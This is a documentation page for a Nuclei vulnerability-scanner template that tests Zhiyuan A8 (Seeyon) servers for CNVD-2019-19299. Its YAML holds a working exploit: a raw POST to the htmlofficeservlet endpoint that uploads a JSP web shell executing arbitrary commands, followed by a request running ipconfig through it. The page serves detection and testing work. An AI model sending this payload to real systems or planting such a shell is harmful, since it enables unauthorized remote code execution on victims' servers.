Skip to content
Nuclei Templates

Zhiyuan A8 - Remote Code Execution

ID: CNVD-2019-19299

Severity: critical

Author: daffainfo

Tags: cnvd2019,cnvd,zhiyuan,rce,intrusive

Description

Section titled “Description”

Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.

YAML Source

Section titled “YAML Source”
id: CNVD-2019-19299


info:
  name: Zhiyuan A8 - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
  reference:
    - https://www.cxyzjd.com/article/guangying177/110177339
    - https://github.com/sectestt/CNVD-2019-19299
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd2019,cnvd,zhiyuan,rce,intrusive


http:
  - raw:
      - |
        POST /seeyon/htmlofficeservlet HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close


        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
        OPTION=S3WYOSWLBSGr
        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
        = WUghPB3szB3Xwg66 the CREATEDATE
        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
        originalFileId = wV66
        originalCreateDate = wUghPB3szB3Xwg66
        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
        needReadFile = yRWZdAS6
        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
      - |
        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_1, "htmoffice operate")'
          - 'contains(body_2, "Windows IP")'
        condition: and
# digest: 490a0046304402206b6533009765aa7b3a8c29cdbda0eb038cc6435786cd1bb3dd55da9d0f60621602204ed0b6f6c097358f89ee13744e4bf3c639961fc46c9e911c7ab474bcc9bcb658:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2019/CNVD-2019-19299.yaml"

View on Github